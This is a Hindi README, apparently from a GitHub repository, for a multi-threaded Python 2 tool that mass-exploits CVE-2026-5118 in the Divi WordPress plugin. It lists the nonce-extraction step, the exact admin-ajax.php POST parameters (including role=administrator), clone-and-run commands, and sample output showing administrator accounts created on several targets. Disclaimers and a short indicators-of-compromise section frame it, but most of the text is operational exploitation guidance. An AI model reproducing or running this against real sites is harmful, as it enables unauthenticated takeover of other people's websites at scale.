
CVE-2026-5118 – Divi WordPress प्लगइन के लिए Python2 बड़े पैमाने पर शोषण admin-ajax.php के माध्यम से बिना प्रमाणीकरण के व्यवस्थापक पंजीकरण। नॉन्स निष्कर्षण के साथ मल्टी-थ्रेडेड स्कैनर।
⚠️ चेतावनी: यह उपकरण केवल अधिकृत पैठ परीक्षण और सुरक्षा अनुसंधान के लिए है।
कंप्यूटर सिस्टम में अनधिकृत पहुंच अवैध है। केवल उन सिस्टम पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट लिखित अनुमति है। अधिक अस्वीकरण आप Jenderal92 के कवर पर देख सकते हैं। आप इसे यहाँ !!! देख सकते हैं
यह Python 2 स्क्रिप्ट Divi WordPress प्लगइन (और संबंधित Divi फॉर्म) में एक विशेषाधिकार वृद्धि भेद्यता का शोषण करती है। यह दूरस्थ रूप से एक व्यवस्थापक खाता पंजीकृत करने की अनुमति देती है:
fb_nonce निकालना।role=administrator के साथ /wp-admin/admin-ajax.php पर एक तैयार किया गया मल्टीपार्ट अनुरोध भेजना।https:// जोड़ता है।de_fb_obj)।success, user_id, user created, आदि)।results.txt में इस प्रारूप में: https://target.com/wp-admin/ | username | passwordurllib2, Queue, threading का उपयोग करता है – संशोधनों के बिना Python 3 के साथ संगत नहीं है)git clone https://github.com/Jenderal92/CVE-2026-5118.git
cd CVE-2026-5118
chmod +x CVE-2026-5118.py
एक टेक्स्ट फ़ाइल बनाएं जिसमें प्रति पंक्ति एक डोमेन या URL हो। आप http:// / https:// छोड़ सकते हैं – स्क्रिप्ट डिफ़ॉल्ट रूप से https:// जोड़ देगी।
उदाहरण targets.txt:
example.com
https://vulnerable-site.com
http://127.0.0.1/wordpress
test-site.org
python CVE-2026-5118.py targets.txt
[*] Total targets : 4
[*] Credentials : Attacker / Attacker@123#+
[*] Threads : 20
[*] Output file : results.txt
[1] Checking https://example.com
[+] SUCCESS! https://example.com/wp-admin/
[2] Checking https://vulnerable-site.com
[+] SUCCESS! https://vulnerable-site.com/wp-admin/
[3] Checking http://192.168.1.100/wordpress
[3] FAILED http://192.168.1.100/wordpress
[4] Checking https://test-site.org
[4] FAILED https://test-site.org
=== DONE ===
Successful: 2 / 4
results.txt)https://example.com/wp-admin/|Attacker|Attacker@123#+
https://vulnerable-site.com/wp-admin/|Attacker|Attacker@123#+
आप स्क्रिप्ट के शीर्ष पर निम्नलिखित वेरिएबल्स को अनुकूलित कर सकते हैं:
https:// जोड़ता है।fb_nonce खोजता है।multipart/form-data POST का निर्माण करता है जिसमें शामिल हैं:
action=de_fb_ajax_submit_ajax_handlerfb_nonce=<extracted nonce>role=administratorde_fb_user_login / user_loginde_fb_user_pass / user_passde_fb_user_email / user_emailDivi का उपयोग करने वाले WordPress व्यवस्थापकों के लिए:
admin-ajax.php अनुरोधों की निगरानी के लिए एक सुरक्षा प्लगइन (Wordfence, Sucuri) का उपयोग करें।role पैरामीटर हो जिसमें हेरफेर किया जा सके।समझौते के संकेतक (IOCs):
action=de_fb_ajax_submit_ajax_handler के साथ अप्रत्याशित admin-ajax.php अनुरोधAttacker) के साथ नए व्यवस्थापक उपयोगकर्ताrole=administrator वाला POST डेटायह सॉफ्टवेयर शैक्षिक उद्देश्यों और केवल अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है। लेखक इस उपकरण के दुरुपयोग या इसके कारण होने वाली क्षति के लिए कोई देयता नहीं मानता है। इस सॉफ्टवेयर का उपयोग करके, आप सहमत हैं कि:
इन शर्तों का उल्लंघन करने पर आपराधिक मुकदमा, जुर्माना या कारावास हो सकता है।
सुधारों के लिए पुल अनुरोधों का स्वागत है (Python 3 पोर्ट, बेहतर nonce निष्कर्षण, अतिरिक्त पंजीकरण पथ का पता लगाना)। कृपया नैतिक अस्वीकरण बनाए रखें।
| वेरिएबल | डिफ़ॉल्ट | विवरण |
|---|
DEFAULT_USERNAME | Attacker | पंजीकृत करने के लिए उपयोगकर्ता नाम |
DEFAULT_PASSWORD | Attacker@123#+ | पासवर्ड (विशेष वर्णों के साथ मजबूत) |
DEFAULT_EMAIL | [email protected] | ईमेल पता |
THREAD_COUNT | 20 | समवर्ती थ्रेड्स की संख्या |
OUTPUT_FILE | results.txt | सफल लक्ष्यों को सहेजने के लिए फ़ाइल |